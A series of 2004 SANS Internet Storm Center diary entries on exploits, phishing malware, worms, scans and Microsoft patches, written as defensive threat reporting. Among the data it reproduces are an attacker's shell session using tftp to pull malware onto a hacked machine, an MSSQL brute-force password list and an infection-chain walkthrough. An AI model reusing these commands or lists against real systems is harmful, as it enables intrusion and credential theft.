F0 6A FF FF 55 E4 .j..U.

Notice the string "THCOWNZIIS!" in the payload. This resembles to the THC exploit for SSL PCT that was released in April, although it may also be a new variant.

We have a reader reported that the following was seen on an infected system:

Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]{D}{A}

(C) Copyright 1985-2000 Microsoft Corp.{D}{A}


C:\WINNT\system32 > {A}

cd ..{D}{A}


cd ..{D}{A}


C:\WINNT > {A}

tftp -i xx.xx.xx.xx get p.exe{D}{A}


tftp -i xx.xx.xx.xx get p.exe{D}{A}

Transfer successful: 13824 bytes in 1 second, 13824 bytes/s{D}{D}{A}


C:\WINNT > {A}





C:\WINNT > {A}

tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A}


tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A}

Transfer successful: 53760 bytes in 4 seconds, 13440 bytes/s{D}{D}{A}


C:\WINNT > {A}






If you have a system that has been compromised, please send us a note with system configuration and patch level.
Exploits for MS04-022

Exploits for MS04-022 (Vulnerability in Task Scheduler Could Allow Code Execution) are known. By creating a specially crafted ".job" file, it is possible to cause a remote code execution using a number of common place applications as the attack vectors.

Do remember to update your system asap if you have not done so.


Yesterday diary on Russian Bank Scam ( http://isc.sans.org/diary.php?date=2004-07-16 ), we have received another similar attack on PayPal. Except for the IP addresses, the email is very similar to the one posted at


We have notified PayPal and they are investigating the case.


Published: 2004-07-16

(Updated) Another Russian Bank Scam, New Exploit for MS04-020

New Exploit for MS04-020 The ISC was notified earlier today that there was a public release of a Windows POSIX local privilege escalation exploit (MS04-020). Time to patch was last Tuesday. This is not a remote access issue, but one that still needs to be addressed and corrected.
Another Russian Bank Scam. (Updated 2230 UTC) All three of the sites hosting the malware related to this incident remain online. The ISC will not publicize the IP addresses of the sites, but we will mention the names of the providers in the hope that they will take action:


Global Net Access

Reseller Matrix

(Updated 1700 UTC) After comparing notes with the US-CERT this morning, we have come to the conclusion that this episode is another page in a long chapter of similar activity. A very nice write up on the malware is online at http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=142

The sites we have been looking at have files dated as early as April 23rd, so it is likely that this scam has been working since then or earlier. The URL above is dated June 3rd, confirming that it has been in circulation at least six weeks. Here are the similarities:

- The Australian analysis starts with a machine at In our case, the compromised box in New York City has a file structure in the "ws" subdirectory that looks like this, and is presumably the equivalent site for the current round:

Parent Directory 15-Jul-2004 22:30 -

1.html 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k


(several dozen more)


eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

eBayISAPI.dll&ViewIt..> 13-Jul-2004 06:16 1k

main1.chm 13-Jul-2004 06:47 14k

new_links_2.bat 13-Jul-2004 06:42 73k

page.hta 13-Jul-2004 06:47 4k

page.php 13-Jul-2004 06:47 1k

main1.chm is the file that the phishing email points to, and it launches the series of exploits. In the Australian analysis, there is a reference to mstasks.exe. In our sample, we found that it is named mstasks1.exe. This file is located in the root directory of the New York City computer rather than the /ws directory.

- The Australian analysis then goes to where additional files are pulled. In our case, the next stop is in Atlanta and here's the directory listing of /loads at that site:
Parent Directory 29-May-2004 01:24 -

delloader.exe 29-Apr-2004 16:10 3k

[DIR] id/ 16-Jul-2004 08:44 -

loger.exe 15-Jul-2004 22:43 34k

loger.php 23-Apr-2004 07:54 1k

post.php 23-Apr-2004 07:54 1k

screen.exe 15-Jul-2004 22:37 175k

screen.php 23-Apr-2004 07:54 1k

test.txt 16-Jul-2004 08:40 14.7M

update.php 23-Apr-2004 07:55 1k

The id directory and the text.txt files contain data on the compromised computers (keystrokes and so forth). Both are quite large and indicate that thousands of accounts have been hijacked.

Other than the differences in the URLs, the Australian analysis of the executables is the same as ours. They are UPX packed, but not encoded.

One final note, we are tracking an FTP site related to this that does not appear to be mentioned in the Australian analysis. This might be a small improvement on the attacker's code or just a variant on delivery mechanisms.

A reader contacted the ISC early on Friday morning to report yet another online banking scam. In this case, the victim receives a forged email from PayPal instructing them that their account appears to have unauthorized access attempts and they need to change their password for their protection. Clicking on the embedded link takes the victim to a web site hosted by a cable modem user near New York City.

If the victim is using Internet Explorer and the browser is not patched for the .chm exploit, the victim's browser is directed to download several files including executables from a web hosting site in Atlanta. The .chm patch is included in the latest cumulative security update for Outlook Express at

The files on the Atlanta site attempt to capture login and password activity, then upload that information to a data repository at the same site. As of early morning on July 16th there appears to be over 11,000 victims with over 16,000 captured passwords and account information. The data collection starts in early May and is unfortunately still continuing. The Atlanta site has been notified. The Department of Homeland Security and US-CERT have also been notified.

One of the executable files contains the list of banks below. URLs viewed by the ISC in files at the Atlanta site include additional banking and financial sites. The ISC has made the files available to the US-CERT for their investigation.










Again, this scam will not work if Internet Explorer is properly patched. Mozilla, Netscape, Opera, and other browsers are not affected by this.

Many thanks to ISC Handlers Lorna Hutcheson and John Bambenek for their extraordinary efforts during the early hours of Friday morning.

Marcus H. Sachs

Handler on Duty


Published: 2004-07-15

Unidentified E-mail worm, PHP server vulnerabilities, MS SMS Client DoS

Unidentified E-mail Worm

Update: AV Vendors are now getting signatures out that identify this as Bagel.AF (TL)

Handler Tom Liston captured what appears to be a new hybrid network/email worm that is not currently detected with any of 12 popular anti-virus tools. The worm included a Control Panel Applet (.cpl) attachment that, when executed, drops an EXE file and scans other systems on the local network for Windows networking service including TCP/1033, TCP/1034, UDP/1027, UDP/137 and UDP/138.

Early analysis indicates the malware may try to avoid detection by stopping popular anti-virus and personal firewall tools, and may try to spread over peer-to-peer networks by posing as key generation and crack software for Microsoft Office, Windows XP and other popular software. Strings in the executable code include the filenames "sysxp.exe" and "re_file.exe" in the C:\WINDOWS\System32 folder, as well as several website URL's that include the filename "o.php" in the root directory. One potentially telling string is "DesignedAsTheFollowerOfSkynet".

While this worm resembles a variant of the NetSky worm, the alleged author of NetStky Sven Jaschan was arrested 10 weeks ago today as reported by F-Secure. This may be the work of a copycat author. Yay.

Potential subject lines for this worm include:

Re: Msg reply

Re: Hello

Re: Yahoo!

Re: Thank you!

Re: Thanks

RE: Text message

Re: Document

Incoming message

Re: Incoming Message

RE: Incoming Msg

RE: Message Notify




Fax Message

Protected message

RE: Protected message

Forum notify

Site changes

Re: Hi

Encrypted document

More information will be posted as warranted.


PHP Server Vulnerabilities

Two vulnerabilities have been reported that affect PHP servers versions 4.3.7 and earlier, and 5.0.0RC3 and earlier. The first vulnerability allows a remote attacker to overwrite portions of memory by exceeding the memory_limit directive in the PHP configuration, allowing them to execute arbitrary code on vulnerable systems. The second vulnerability is a weakness in the PHP strip_tags() function, commonly used to sanitize input fields in a web form to eliminate HTML tags. A weakness in the filtering mechanisms allows an attacker to bypass this check by embedding a NULL byte in the HTML tags.

While an exploit for the first vulnerability has not been released to the public, the second vulnerability was announced with sufficient detail such that it can be abused by an attacker to exploit Opera and Internet Explorer browsers in cross-site scripting attacks in conjunction with sites that run PHP. Administrators with PHP websites (which is included by default in many Apache installations) are encouraged to upgrade their version of PHP to the 4.3.8 or the released 5.0.0 version.


Microsoft SMS Client DoS Vulnerability

A post on the BUGTRAQ mailing list indicates that the Microsoft Systems Management Server client software is vulnerable to a denial of service attack from an attacker who can reach the client software on TCP port 2702. Sufficient details have been posted to reproduce this attack - Microsoft was not notified of this flaw before the public release of this vulnerability.

We have not had the opportunity to confirm this vulnerability at this time. If anyone can confirm or deny this issue, please send the details of your analysis to http://isc.sans.org/contact.php.

--Joshua Wright/Handler du jour


Published: 2004-07-13

Microsoft Security Patches, VBS/Inor Trojan Variant, Phrack 62 Release, BHODemon Mirror

New critical/important/moderate patches from Microsoft

As expected, Microsoft issued its monthly security bulletin today. There are several patches designated as "critical" and "important." You can read the technical bulletin at the following URL:
There is also a non-technical version of the alerts at the following URL:

Swa Frantzen, a fellow ISC handler, wrote up the following summary of issues addressed by Microsoft's security bulletin:

References CAN-2004-0215
Users of Outlook Express should look into this one. For now it's a DoS only, so it can probably be last on your priorities. As always with this kind of software, the preview pane aggravates
the problem. Turning preview panes off is a good idea.

References CAN-2004-0213
Local users can escalate to system privilege levels. If you don't trust all your local users this is probably somewhat more than important to deal with soon. This can probably be exploited later in a compounded attack, so best to take care of it even if you trust your local users.

References CAN-2004-0210
A buffer overflow in the POSIX code causes local users to be able to completely control the system.
For now Windows XP and 2003 are exempt form this. If you don't trust all your local users this is probably somewhat more than important to deal with soon. This can probably be exploited later in a compounded attack, so best to take care of it even if you trust your local users.

References CAN-2004-0205
IIS 4.0 remote buffer overflow - full remote control. If you still use IIS 4.0 this is probably yet another reason to upgrade.

References CAN-2004-0212
REMOTE code execution in the task scheduler with the privileges of the logged in user. Windows 2003 is for now exempt from the problem. Interesting workaround: block access to files ending in ".job" in the perimeter

References CAN-2004-0201 and CAN-2003-1041
Remote code execution in the help system with the privileges of logged in user. Outlook is a transport vector for this vulnerability--easy worm potential!

References CAN-2004-0420
Remote code execution via Windows shell with the privileges of logged in user. Exploit uses the COM subsystem to trigger execution that's supposed to be blocked based on extensions. Although Microsoft considers this patch "important," public availability of the exploit raises our assessment the vulnerability's severity.

A new variant of the VBS/Inor trojan via spam messages

Several people wrote to us about the VBS/Inor spam-based attack that MessageLabs described in an alert it issued today. As far as I can see, no vulnerability is actually being exploited here. The browser will prompt the users whether they want to perform actions such as writing and executing files. This is a multi-stage attack; several scripts/programs used in the attack are known malware specimens, and are likely to be recognized by up-to-date anti-virus software.

1. The victim receives an HTML-based unsolicited e-mail message, which contains an IFRAME link that retrieves link.html from the malicious site.

2. The link.html page downloads the link.php page from the same site via the following HTML code snippet: '<object data="link.php">'. Contents of the link.php file are obfuscated using Windows Script Encoder. Most anti-virus tools recognize the manually-decoded version of link.php as VBS/Inor; however, they do not presently recognize the encoded version of link.php as malicious code.

3. The link.php file contains VBScript code that attempts to create a small executable on the victim's system in c:\x.exe using 'CreateObject("Scripting.FileSystemObject")'. The x.exe file is embedded into link.php as a string of binary digits. Most anti-virus tools recognize x.exe as malware, using names such as "TrojanDownloader.Win32.Small.ar" (Kaspersky) and "Proxy-Hino.dldr" (McAfee).

4. The link.php file uses x.exe to retrieve ss.exe from the malicious site, which x.exe launches. Kaspersky recognizes ss.exe as "Trojan.Win32.Genme.a". Several other anti-virus tools that I tried did not recognize ss.exe as malicious code. Among other actions, ss.exe connects to the originating server to "register" the infected system with the index.php script via URI such as 'index.php?Client='. I have not had a chance to analyze ss.exe, so if you happen to know the nature of this malicious executable, please let us know.

The release of Phrack 62

Phrack #62 was released today, publishing a number of articles that security professionals will find of interest. You can read Phrack at the following URL:

BHODemon mirrored at PCWorld

Andrew Brandt from PC World magazine let us know that PCWorld.com's website is now mirroring BHODemon on their site, to help ease the load on BHODemon author's server. The mirror site is at:
We mentioned BHODemon in our June 29th 2004 diary at the following URL:

Lenny Zeltser

ISC Handler on Duty



Published: 2004-07-12

'Patch Tuesday' is tomorrow - Continued FTP Scans

It's the second Tuesday of the month again, and that means ...

It's time for another round Microsoft patches. We don't have any information yet on how many patches will be released, or how severe the associated vulnerabilities will be. Could we be lucky three months in a row?

Continued FTP Scans

Although the volume has slowed, we're still receiving reports of distributed FTP scans with all but one report comming in from a university.

Chris (dot) Carboni (at) Verizon (dot) net


Published: 2004-07-11

Distributed FTP/Port 21 scan follow-up; Port 23 scan increases;

Distributed FTP/Port 21 scan follow-up;

FTP/Port 21 scanning is up (link below) and University admins reading the Handlers Diary have submitted additional logs and supplemental information concerning the apparent distributed ftp scan activity reported earlier (links below). At this time there are no reports other than those from Universities. Passwords used by different scanners were reported to be English, French and German. There was only one correlation between the logs that I examined, ftp scans originating from IP address (ABordeaux-202-1-1-141.w217-128.abo.wanadoo.fr). The offending IP had not been recently reported to DShield (link below).

FTP Scans - Universities only?

Distributed FTP Brute Force Scans - Is radmin back?
"in addition, the source addresses for the attack were different at all three institutions."

DShield Profile of

DShield Port 21 activity trending up;


Port 23 scan increases;

Another Diary reader submitted interesting information on what "looks a lot like a distributed telnet scan. 10 different (or 1 spoofed ?) sources, connecting at almost the same time, each trying 2 times."
DShield Port 21 activity trending up;


MS Internet Connection Firewall (ICF) renamed "Windows Firewall" in XPSP2, firewall rules edited in INF file;

White Paper information includes that post SP2 "the location of the Windows Firewall INF file is: %windir%\Inf\Netfw.inf" and installation modifications to the firewall ruleset can be accomplished by following a few simple steps ... with the final step "Run the command netsh firewall reset on the computer running Windows XP SP2. This can be done manually by entering the command at a command prompt or by including the command in a run-once script." From the whitepaper "Using the Windows Firewall INF File in Microsoft Windows XP Service Pack 2


lessons learned(?);

While researching other "Diary" security issues I ran across this less than well publicized case from earlier in the year. As a fwiw I include it as a "lessons learned" item for your consideration ... "Among those outside computers was a computer box BORGHARD was surreptitiously controlling as a "slave" intermediary computer from a remote location. That "slave" computer was sitting, unnoticed but nevertheless under operation by BORGHARD, in BORGHARD's former cubicle at a company where BORGHARD had worked prior to joining Netline." And here I have to ask, if they didn't notice the extra box in "BORGHARD's former cubicle", do you think anyone physically checked for any KeyCatchers left attached to sensitive systems, to have been "read"
from the slave?

Patrick Nolan with nice assists from multiple University admins, John Bambanek (FTP), Chris Carboni (FTP), Tom Liston (Help needed) and Joshua Wright (Help needed)


Published: 2004-07-10

FTP Scans - Universities only? : BHODemon followup

FTP Scans

Thank you for those that have reported in as requested from yesterday's diary about ftp scans. So far, everyone who has reported in with matching behavior appears to be reporting on a university network. If you have or can obtain a list of IP addresses associated with this behavior, please send them in. If anyone has seen this activity that is not from a university, we'd be interested in knowing.

BHODemon update

Or why popularity isn't necessarily a good thing

Not too long ago, we mentioned a tool called BHODemon that can help to identify any browser helper objects installed an a system. Jason, an ISC diary reader, reported in that it seemed as if something was amiss. He noted that the link to BHODemon v 1.0 was broken and that BHODemon v 2.0 was only 40kb instead of the reported 1417kb.

After contacting Definitive Solutions, the maker of BHODemon, we were able to learn of the reason behind this mysterious observation. The following is from Larry Leonard:

"My bandwidth limit was incorrectly set on my hosting site, and I burned through
about $10,000 of bandwidth before I knew it. From the mention on the ISC, it
went to SlashDot, and then NPR (National Public Radio).

So right now, I'm negotiating to get that forgiven while the website is essentially shutdown. The 40K program was *supposed* to be a tiny app that simply displayed an explanatory message. Unfortunately, it requires the latest versions of Microsoft DLLs (MFC71.DLL), which many people don't have yet - it doesn't come with even WinXP Pro, for some unfathomable reason. So I'm working on that, too."

Note that the problem with the DLL dependency problem now appears to be corrected and at this time the BHODemon 2 file is approximately 56kb, but this may change. Those wishing to obtain a copy of this program might try searching Google for "BHODemon" to find alternative locations to get the application or check back at Definitive Solutions site next month.

T. Brian Granier

Handler on Duty


Published: 2004-07-09

Distributed FTP Brute Force Scans - Is radmin back?

Distributed FTP Brute Force Scans

Clarke Morledge of College of William and Mary reports that beginning about 08:30 EDT yesterday, systems at his institution as well as two other Universities have been subjected to what appears to be a distributed brute force FTP attack.

Analysis of the data shows login attempts for 'root', 'admin' and others with various passwords from over thirty different IP addresses. In addition, the source addresses for the attack were different at all three institutions.

If you discover that you have been subjected to this or a similar attack as well, drop us a note and let us know.

radmin 2.0?

Paul Asadoorian at Brown University reports that several systems have been compromised by what seems to be a radmin variation. It should be noted that these systems were all found to be missing at least one major patch. Symptoms of the compromise are as follows:

- They are all scanning the Internet for hosts listening on port 1433

- They are all listening on port 26101 TCP (radmin renamed to lsass.exe in c:\winnt)

- The file tapiui.exe was found in the c:\winnt\system32 directory and it was the FTP server listenting on port 35894.

- The file "kill.exe" was found in the root of the c drive

- They all listen on the following port for FTP:

Port: 35894

Banner: 220 Microsoft FTP Server

- The file tapiui.exe was found in the c:\winnt\system32 directory and it was the FTP server listenting on port 35894.

Various AV vendors list Trojans and Backdoors that mention radmin V 2.0 but none seem to show the same files being dropped or registry entries such as:




Our malware analysis team is examining the files.
This is probably a good time to restate our recomendation that if a system under your control has been compromised, flatten and rebuild it securely from known good media.

SANSFIRE - If you're at SANSFIRE or in the Monterey area, stop into the IPNet Hacking Challenge and say 'Hi' to the handlers.

Offer to take them out and buy them a beverage or nine.

Make sure they have a tough time getting up in the morning. ;)

Chris 'There is no spoon or chip on my shoulder' dot Carboni at verizon dot net


Published: 2004-07-08

Time to update Mozilla/Firefox/Thunderbird and Ethereal; also: sightings of infected IIS 6 servers.

Time to update Mozilla/Firefox/Thunderbird and Ethereal; also: sightings of infected IIS 6 servers.

Mozilla and Firefox Update Fixes Vulnerability

It's time to update your browser, though this time the problem is not with Internet Explorer, but with Mozilla and Firefox running on Windows. As described in the eWeek article at
http://www.eweek.com/article2/0,1759,1621463,00.asp , a flaw in the way Mozilla and Firefox handled links containing the shell: suffix could allow a malicious web site to run arbitrary code on the visitor's system. We advise you to upgrade to Mozilla 1.7.1 or Firefox 0.9.2 to patch this vulnerability. Alternatively, you may install the patch from

For more information about this vulnerability and ways of addressing it, please see
. This URL also points out that Thunderbird, an email client that's part of the Mozilla suite, is vulnerable, and explains how you can address the Thunderbird vulnerability as well.

Ethereal Update Fixes Vulnerabilities

A recent upgrade to Ethereal, a popular network sniffer, resolves several published vulnerabilities. Since we haven't seen this mentioned on the usual forums, we thought we'd let you know about the update in this note. If you're running Ethereal versions 0.8.15 up to and including 0.10.4, you will probably want to upgrade to version 0.10.5. See
http://www.ethereal.com/appnotes/enpa-sa-00015.html for more details.

A Report Regarding Infected IIS 6 Servers

We received a report from Dan Hubbard, from Websense Inc., regarding 100 sites running IIS 6.0 that were compromised as part of a Scob/Download.Ject attack. (We mentioned this attack in the June 24th diary at
http://isc.sans.org/diary.php?date=2004-06-24 .) Although prior reports linked Scob/Download.Ject to a vulnerability in IIS 5, these 100 sites are running IIS 6. Mr. Hubbard's current assessment is that the systems were probably compromised when they ran IIS 5, and were not disinfected prior to an upgrade. We don't presently have any indications that this attack affects IIS 6 servers, but please let us know if you have witnessed IIS 6 server compromises related to Scob/Download.Ject infections.

Lenny Zeltser

Handler on Duty



Published: 2004-07-07

CGI Email Script Scanning Update, MS SQL Server scanning, Bagle Source Code Released, Comments on 802.11i

CGI Email Script Scanning Update

In yesterday's diary entry, handler Tom Liston identified a distributed scan that was targeting sites for CGI mailer vulnerabilities. Further analysis of this activity indicates that the attackers were leveraging more than 1000 open proxy servers to distribute the scan, targeting hundreds of thousands of systems.

With the help of a University system's administrator, we were able to identify five controller hosts behind this attack, and have notified the appropriate ISP's. Many thanks to everyone who submitted logging information to help us track down the specifics of this attack.

The remaining question about this attack is why - it seems this attack used a fairly sophisticated scanning mechanism to remain anonymous (distributing the scan over a large number of systems). The target seems strange, since 99.95% of the systems that we were able to capture logging data returned "404 - File Not Found". Even if the target CGI's are found on a vulnerable system, they probably offer little value to an attacker. A few readers have suggested using these vulnerable systems for SPAM relays, but it seems there are easier ways to distribute SPAM than scanning for 1990'ish CGI vulnerabilities.

If anyone has a system with a vulnerable installation of formmail.pl that was exploited in these scans, please let us know.

MS SQL Server Scanning

Paul Asadoorian, GCIH and GCIA wrote in identifying several Windows systems that were discovered compromised on his network with the following characteristics:

+ They are all scanning the Internet for hosts listening on port 1433

+ They are all listening on port 26101 TCP (suspected backdoor)

+ They are all listening on TCP/35894 with a FTP banner message "220 Microsoft FTP Server"

These systems appear to be used for attacking MS SQL Servers, as reported in the 7/4 incident handlers report. Paul was able to identify these systems by parsing the output of TCPDump capture files with the following script for Unix systems:

$ tcpdump -c 500 -i eth1 -nn src net YOUR.SUBNET.0.0/16 and dst port 1433 | cut -d" " -f3 | cut -d"." -f1,2,3,4 | sort | uniq -c | sort

Organizations can benefit from from monitoring egress TCP/1433 traffic as a sign of infected systems.

Bagle Source Code Released

ZD Net is reporting the latest variants of the Bagle virus also include the assembler-language source code for the malware. This may result in additional viral strains from new authors. Yay.


Comments on 802.11i

Taking the opportunity to comment on the recent ratification of the 802.11i specification, organizations who are looking to purchase new 802.11 equipment should work with vendors to get a commitment for an upgrade path with any new hardware to support the 802.11i specification and WPA-II interoperability standard.

The IEEE has made significant improvement in protecting wireless networks with the ratification of the 802.11i specification. By adopting this technology, organizations benefits from strong encryption, non-repudiation and integrity on their wireless networks. However, the 802.11i specification does not protect wireless networks from attacks that exploit weak network authentication mechanisms (such as the LEAP authentication protocol), from denial-of-service attacks or from wireless client vulnerabilities. Deploying a defense-in-depth architecture is the only way to secure wireless networks, with the 802.11i specification being an important portion of a strong deployment.

--Joshua Wright/Handler on Duty


Published: 2004-07-06

Google Hiccup, CGI Email Script Scanning, New NIST Doc, SANSFIRE

Google "Hiccup"

We've gotten reports that Google was inoperable for a short period of time in the late hours of 06/06/2004 (GMT). We currently have no information on the cause of the outage.

CGI Email Script Scanning

From our mailbag comes a report by Michael Black at Essex Corporation who alertly noticed a distributed webserver scan for various email cgi-scripts:

213.200.xxx.xxx - - [03/Jul/2004:10:47:45 -0400] "POST /cgi-bin/asomail.cgi HTTP/1.0" 404 916

65.19.xxx.xxx - - [03/Jul/2004:10:47:53 -0400] "POST /cgi-bin/contact.cgi HTTP/1.0" 404 916

80.65.xxx.xxx - - [03/Jul/2004:10:47:55 -0400] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 916

12.14.xxx.xxx - - [03/Jul/2004:10:48:01 -0400] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 916

149.201.xxx.xxx - - [03/Jul/2004:10:48:03 -0400] "POST /cgi-bin/FormMail.pl HTTP/1.1" 404 916

193.255.xxx.xxx - - [03/Jul/2004:10:48:06 -0400] "POST /cgi-bin/fmail.pl HTTP/1.0" 404 916

208.18.xxx.xxx - - [03/Jul/2004:10:48:06 -0400] "POST /cgi-bin/form.cgi HTTP/1.0" 404 916

67.94.xxx.xxx - - [03/Jul/2004:10:48:07 -0400] "POST /cgi-bin/contact.pl HTTP/1.0" 404 916

66.0.xxx.xxx - - [03/Jul/2004:10:48:09 -0400] "POST /cgi-bin/mail.cgi HTTP/1.1" 404 916

66.103.xxx.xxx - - [03/Jul/2004:10:48:23 -0400] "POST /cgi-bin/feedback.cgi HTTP/1.0" 404 916

209.137.xxx.xxx - - [03/Jul/2004:10:48:25 -0400] "POST /cgi-bin/cgiemail/contact.txt HTTP/1.0" 404 916

200.78.xxx.xxx - - [03/Jul/2004:10:48:27 -0400] "POST /cgi-bin/form.pl HTTP/1.0" 404 916

208.185.xxx.xxx - - [03/Jul/2004:10:48:32 -0400] "POST /cgi-bin/mailform.cgi HTTP/1.0" 404 916

168.9.xxx.xxx - - [03/Jul/2004:10:48:33 -0400] "POST /cgi-bin/feedback.pl HTTP/1.0" 404 916

62.23.xxx.xxx - - [03/Jul/2004:10:48:39 -0400] "POST /cgi-bin/mail.pl HTTP/1.0" 404 916

207.248.xxx.xxx - - [03/Jul/2004:10:49:00 -0400] "POST /cgi-bin/sender.pl HTTP/1.0" 404 916

207.32.xxx.xxx - - [03/Jul/2004:10:49:02 -0400] "POST /cgi-bin/mailer/mailer.cgi HTTP/1.1" 404 916

217.68.xxx.xxx - - [03/Jul/2004:10:49:03 -0400] "POST /cgi-bin/ezformml.cgi HTTP/1.1" 404 916

207.248.xxx.xxx - - [03/Jul/2004:10:49:04 -0400] "POST /cgi-bin/email.cgi HTTP/1.0" 404 916

168.10.xxx.xxx - - [03/Jul/2004:10:49:06 -0400] "POST /cgi-bin/formmail HTTP/1.0" 404 916

65.17.xxx.xxx - - [03/Jul/2004:10:49:06 -0400] "POST /cgi-bin/npl_mailer.cgi HTTP/1.1" 404 916

216.43.xxx.xxx - - [03/Jul/2004:10:49:11 -0400] "POST /cgi-bin/FormMail.cgi HTTP/1.0" 404 916

63.228.xxx.xxx - - [03/Jul/2004:10:49:12 -0400] "POST /cgi-bin/email.pl HTTP/1.0" 404 916

193.170.xxx.xxx - - [03/Jul/2004:10:49:23 -0400] "POST /cgi-bin/BFormMail.pl HTTP/1.0" 404 916

207.127.xxx.xxx - - [03/Jul/2004:10:49:30 -0400] "POST /cgi-bin/contactus.cgi HTTP/1.0" 404 916

64.25.xxx.xxx - - [03/Jul/2004:10:49:30 -0400] "POST /cgi-bin/mailer.cgi HTTP/1.1" 404 916

200.74.xxx.xxx - - [03/Jul/2004:10:49:31 -0400] "POST /cgi-bin/friends.cgi HTTP/1.0" 404 916

208.185.xxx.xxx - - [03/Jul/2004:10:49:32 -0400] "POST /cgi-bin/mailer.pl HTTP/1.0" 404 916

207.241.xxx.xxx - - [03/Jul/2004:10:49:32 -0400] "POST /cgi-bin/tellafriend.cgi HTTP/1.0" 404 916

66.103.xxx.xxx - - [03/Jul/2004:10:49:50 -0400] "POST /cgi-bin/mailto.cgi HTTP/1.0" 404 916

148.233.xxx.xxx - - [03/Jul/2004:10:49:56 -0400] "POST /cgi-bin/mailto.cgi HTTP/1.0" 404 916

137.204.xxx.xxx - - [03/Jul/2004:10:50:04 -0400] "POST /cgi-bin/af.cgi HTTP/1.1" 404 916

81.196.xxx.xxx - - [03/Jul/2004:10:50:05 -0400] "POST /cgi-bin/cgiemail/mailtemp.txt HTTP/1.1" 404 916

65.19.xxx.xxx - - [03/Jul/2004:10:50:10 -0400] "POST /cgi-bin/tell/tell.cgi HTTP/1.0" 404 916

213.134.xxx.xxx - - [03/Jul/2004:10:50:11 -0400] "POST /cgi-bin/mailto.pl HTTP/1.1" 404 916

209.2.xxx.xxx - - [03/Jul/2004:10:50:11 -0400] "POST /cgi-bin/referral.cgi HTTP/1.0" 404 916

There are several interesting things to note about this scan. It is obviously a distributed scan that, because of the tight timing involved, appears to be controlled by a one-to-many channel. An IRC controlled bot-net comes immediately to mind.

Scanning for these types of scripts seems to be a rather outdated practice, something that we haven't seen in some time. We found ourselves wondering about the value of finding such an installation vs. the effort expended in scanning for it.

If anyone else notices scanning of this sort, please pass the details along using our contact form: http://isc.sans.org/contact.php

(Note: Source IPs in the above list have been obfuscated. We are currently investigating the malware that may be installed on these machines.)

NIST Publishes Guide For Securing Windows XP

The NIST (National Institute of Standards and Technology) has published,
in draft format, a guide for securing and administering Windows XP. They are soliciting for comments on this draft guide:


Typically, NIST publications are well written and thorough. It is publication SP800-68, "Guidance for Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist - Special Publication 800-68 (Draft)"


If you're on site at SANSFIRE in Monterey, please remember to stop by the IPNet booth and tell all of the ISC Handlers gathered there just how much you appreciate the fact that while they're off in California whooping it up, several of us are "back here" holding down the fort. Tell them that long, involved story about your first computer or, perhaps, show them that pesky rash that just won't go away. Sing them a song, or, better yet, tell a knock-knock joke. Everybody loves knock-knock jokes.


Handler on Duty : Tom "Grumpy 'cause I'm not in Monterey" Liston

LaBrea Technologies - ( http://www.labreatechnologies.com )


Published: 2004-07-05

"New" slammer and BHO's

We received one new report of the virus Swen being seen. It appears to be swen.a.

We received reports of an increase in 1434 traffic. A
slight increase has been seen at isc.sans.org.
Based on the packets submitted this appears to be the
original slammer worm no explaination for this
Slight increase in traffic is currently known. One point to remember is most anti-virus scanners work on file access (open, create, read ...) and will not notify on slammer because it is a worm that only resides in memory.


Published: 2004-07-04

Mailbag Items for Ports 1433 and 113

Port 1433 Mailbag

1433's in the Top Ten ports scanned with a significant increase in the number of Targets.


Significant increases in the number of Targets

scanned have occurred sinse June 12th, and are even more evident when looking further back (next two links;



Diary readers have submittied

interesting information related to exploits aimed at Port 1433.
One honeypot dump submisssion showed a "mssql password brute force attempt" from a couple of days ago. Some lessons learned over time have been:

(1) don't put your db outside the firewall,

(2) don't rely on passwords, since exploiters even try some odd passwords many people consider 'safe'.

(3) set a realistic pw lockout policy - and read the logs

Another Port 1433 honeypot submission from RSS#### was taken from a commercial honeypot product. It showed osql-32 sa login password failures. Passwords attempted (from the submissions only) were were:

blimp, corner, craze, curb, daunt, deadline, delight, devil, dismayed, doom, drizzle, ecstasy, emigrant, entire, evince, eyelid, faulty, finished, flop, forcible, forsale, frontier, garlic, glee, grabat, grower, hard, hectic, hijack, holy, humus, impede, iniquity, inventor, jeweller, keyboard, lamp, lean, lieup, locate, lucky, mallard, matinee, meter, mister, mortgage, mutable, nether, notable, offal, oration, overload, pasture, perform, pink, pirate, poorly, prepare, protect, putout, rainbow, recount.

There has also been some other speculation that a "new mssql brute force tool" is going around so if you've got some info on a new tool please post us a note.
Last item on Port 1433, there's an excellent paper on "TCP/1433 MS-SQL" by Handler Kevin C. Liston at;

Port 113 Mailbag

Other readers have submitted information concerning Port 113 scans mentioned in the Handler's Diary of July 1st 2004.

In addition to the Korgo family of malware listening on Port 113 (T variant and some earlier versions), one submission whose email I returned (rejected at the far end) said he's seeing "attempts at SMTP AUTH, originating from Chinanet" in recent days
and explicitly denied any brute force pw activity. In a portion of my rejected response I also mentioned "It could indicate an NMAP "identd scan being run to
identify a handful of user accounts" and asked if there were any other log correlations from the indicated source IP's.


Discovered on: June 21, 2004, Last Updated on: June 30, 2004 12:09:09

SANS GSEC Tool Survey Responses Requested

On Friday, July 02, Eric Cole emailed SANS GSEC folks and asked for some assistance in "improving the GIAC certification." The assistance is in the form of answering the following:

1) the 10 tools you use most often to get your security job done

2) a brief description of how you use them (optional)

3) the platforms on which you run them

4) the top 3 tips/tricks that you utilize on daily basis that allow you to be more productive

If you get the time/chance to participate and answer these questions please respond to Eric's email ( ;^ ).


Patrick Nolan
Assistance from Johannes, Marc, and Jim, Fan club management by Ed


Published: 2004-07-03

Problem in IE Patch?; Mailbag

Problem in IE Patch?

